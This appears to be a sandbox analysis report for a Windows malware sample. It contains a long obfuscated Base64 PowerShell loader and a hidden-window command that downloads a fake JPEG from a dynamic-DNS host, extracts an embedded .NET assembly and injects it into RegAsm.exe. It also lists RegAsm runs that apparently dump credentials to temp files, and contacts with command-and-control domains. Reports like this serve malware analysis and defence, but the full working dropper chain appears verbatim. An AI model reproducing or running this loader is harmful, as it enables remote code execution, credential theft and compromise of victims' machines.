⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴ZQ≩ ⫻ ㏤ ≪ ㏴2≩ ⫻ ㏤ ≪ ㏴DQ≩ ⫻ ㏤ ≪ ㏴T≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴ZwB0≩ ⫻ ㏤ ≪ ㏴Gg≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴9≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BJ≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴t≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bz≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴YQBy≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴SQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴ZQB4≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴YQBz≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Ng≩ ⫻ ㏤ ≪ ㏴0≩ ⫻ ㏤ ≪ ㏴EM≩ ⫻ ㏤ ≪ ㏴bwBt≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴YQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴9≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴YQBn≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴V≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴FM≩ ⫻ ㏤ ≪ ㏴dQBi≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴By≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴bgBn≩ ⫻ ㏤ ≪ ㏴Cg≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bz≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴YQBy≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴SQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴ZQB4≩ ⫻ ㏤ ≪ ㏴Cw≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴YQBz≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Ng≩ ⫻ ㏤ ≪ ㏴0≩ ⫻ ㏤ ≪ ㏴Ew≩ ⫻ ㏤ ≪ ㏴ZQBu≩ ⫻ ㏤ ≪ ㏴Gc≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bo≩ ⫻ ㏤ ≪ ㏴Ck≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴YwBv≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴bQBh≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BC≩ ⫻ ㏤ ≪ ㏴Hk≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴9≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴WwBT≩ ⫻ ㏤ ≪ ㏴Hk≩ ⫻ ㏤ ≪ ㏴cwB0≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴bQ≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴EM≩ ⫻ ㏤ ≪ ㏴bwBu≩ ⫻ ㏤ ≪ ㏴HY≩ ⫻ ㏤ ≪ ㏴ZQBy≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴XQ≩ ⫻ ㏤ ≪ ㏴6≩ ⫻ ㏤ ≪ ㏴Do≩ ⫻ ㏤ ≪ ㏴RgBy≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴bQBC≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴cwBl≩ ⫻ ㏤ ≪ ㏴DY≩ ⫻ ㏤ ≪ ㏴N≩ ⫻ ㏤ ≪ ㏴BT≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴cgBp≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Zw≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴YgBh≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴ZQ≩ ⫻ ㏤ ≪ ㏴2≩ ⫻ ㏤ ≪ ㏴DQ≩ ⫻ ㏤ ≪ ㏴QwBv≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴bQBh≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴bwBh≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴ZQBk≩ ⫻ ㏤ ≪ ㏴EE≩ ⫻ ㏤ ≪ ㏴cwBz≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴bQBi≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴eQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴D0≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴Bb≩ ⫻ ㏤ ≪ ㏴FM≩ ⫻ ㏤ ≪ ㏴eQBz≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴ZQBt≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴UgBl≩ ⫻ ㏤ ≪ ㏴GY≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bl≩ 
⫻ ㏤ ≪ ㏴GM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴bg≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴EE≩ ⫻ ㏤ ≪ ㏴cwBz≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴bQBi≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴eQBd≩ ⫻ ㏤ ≪ ㏴Do≩ ⫻ ㏤ ≪ ㏴OgBM≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴YQBk≩ ⫻ ㏤ ≪ ㏴Cg≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bj≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴bQBt≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴bgBk≩ ⫻ ㏤ ≪ ㏴EI≩ ⫻ ㏤ ≪ ㏴eQB0≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴cw≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴eQBw≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴9≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bs≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴YQBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BB≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴cwBl≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴YgBs≩ ⫻ ㏤ ≪ ㏴Hk≩ ⫻ ㏤ ≪ ㏴LgBH≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BU≩ ⫻ ㏤ ≪ ㏴Hk≩ ⫻ ㏤ ≪ ㏴c≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Cg≩ ⫻ ㏤ ≪ ㏴JwBk≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴LgBJ≩ ⫻ ㏤ ≪ ㏴E8≩ ⫻ ㏤ ≪ ㏴LgBI≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴bQBl≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴KQ≩ ⫻ ㏤ ≪ ㏴7≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bt≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bo≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴D0≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴eQBw≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴LgBH≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BN≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bo≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴VgBB≩ ⫻ ㏤ ≪ ㏴Ek≩ ⫻ ㏤ ≪ ㏴Jw≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴SQBu≩ ⫻ ㏤ ≪ ㏴HY≩ ⫻ ㏤ ≪ ㏴bwBr≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴K≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴dQBs≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴L≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Fs≩ ⫻ ㏤ ≪ ㏴bwBi≩ ⫻ ㏤ ≪ ㏴Go≩ ⫻ ㏤ ≪ ㏴ZQBj≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴WwBd≩ ⫻ ㏤ ≪ ㏴F0≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴B4≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴LgBC≩ ⫻ ㏤ ≪ ㏴E4≩ ⫻ ㏤ ≪ ㏴UgBU≩ ⫻ ㏤ ≪ ㏴C8≩ ⫻ ㏤ ≪ ㏴O≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴4≩ ⫻ ㏤ ≪ ㏴C8≩ ⫻ ㏤ ≪ ㏴NQ≩ ⫻ ㏤ ≪ ㏴z≩ ⫻ ㏤ ≪ ㏴DE≩ ⫻ ㏤ ≪ ㏴Lg≩ ⫻ ㏤ ≪ ㏴y≩ ⫻ ㏤ ≪ ㏴Dk≩ ⫻ ㏤ ≪ ㏴MQ≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴DM≩ ⫻ ㏤ ≪ ㏴Nw≩ ⫻ ㏤ ≪ ㏴x≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴Nw≩ ⫻ ㏤ ≪ ㏴w≩ ⫻ ㏤ ≪ ㏴DE≩ ⫻ ㏤ ≪ ㏴Lw≩ ⫻ ㏤ ≪ ㏴v≩ ⫻ ㏤ ≪ ㏴Do≩ ⫻ ㏤ ≪ ㏴c≩ ⫻ ㏤ ≪ ㏴B0≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴a≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴L≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴YQB0≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴dgBh≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴bw≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ 
㏴≩ ⫻ ㏤ ≪ ㏴L≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴YQB0≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴dgBh≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴bw≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴L≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴YQB0≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴dgBh≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴bw≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴Cw≩ ⫻ ㏤ ≪ ㏴JwBS≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴ZwBB≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴bQ≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴Cw≩ ⫻ ㏤ ≪ ㏴JwBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴cwBh≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴aQB2≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴KQ≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴fQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴H0≩ ⫻ ㏤ ≪ ㏴';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('≩ ⫻ ㏤ ≪ ㏴','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$link = 'http://servidorwindows.ddns.com.br/Files/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.BNRT/88/531.291.371.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\vnpdpdqccvpmiaqbmzkkghvqxevktzhde"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\givwq"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\ikiorfmye"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.201.86.20.in-addr.arpa | udp |
| US | 107.173.192.135:80 | 107.173.192.135 | tcp |
| US | 8.8.8.8:53 | 135.192.173.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | servidorwindows.ddns.com.br | udp |
| BR | 191.55.76.236:80 | servidorwindows.ddns.com.br | tcp |
| US | 8.8.8.8:53 | 236.76.55.191.in-addr.arpa | udp |
| US | 107.173.192.135:80 | 107.173.192.135 | tcp |
| US | 8.8.8.8:53 | wemberdag.duckdns.org | udp |
| MY | 103.186.116.99:31388 | wemberdag.duckdns.org | tcp |
| US | 8.8.8.8:53 | 99.116.186.103.in-addr.arpa | udp |
| MY | 103.186.116.99:31388 | wemberdag.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vwh4c4yg.f1y.ps1
\??\c:\Users\Admin\AppData\Local\Temp\4kx3h1b1\4kx3h1b1.cmdline
\??\c:\Users\Admin\AppData\Local\Temp\4kx3h1b1\4kx3h1b1.0.cs
\??\c:\Users\Admin\AppData\Local\Temp\4kx3h1b1\CSC8A85977435C44FDE89D0A35EC9FA1467.TMP
C:\Users\Admin\AppData\Local\Temp\RES89B2.tmp
C:\Users\Admin\AppData\Local\Temp\4kx3h1b1\4kx3h1b1.dll
C:\Users\Admin\AppData\Roaming\kidsrosefacingimagestrickin.vBS
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Temp\vnpdpdqccvpmiaqbmzkkghvqxevktzhde
C:\Users\Admin\AppData\Roaming\logs\logs.dat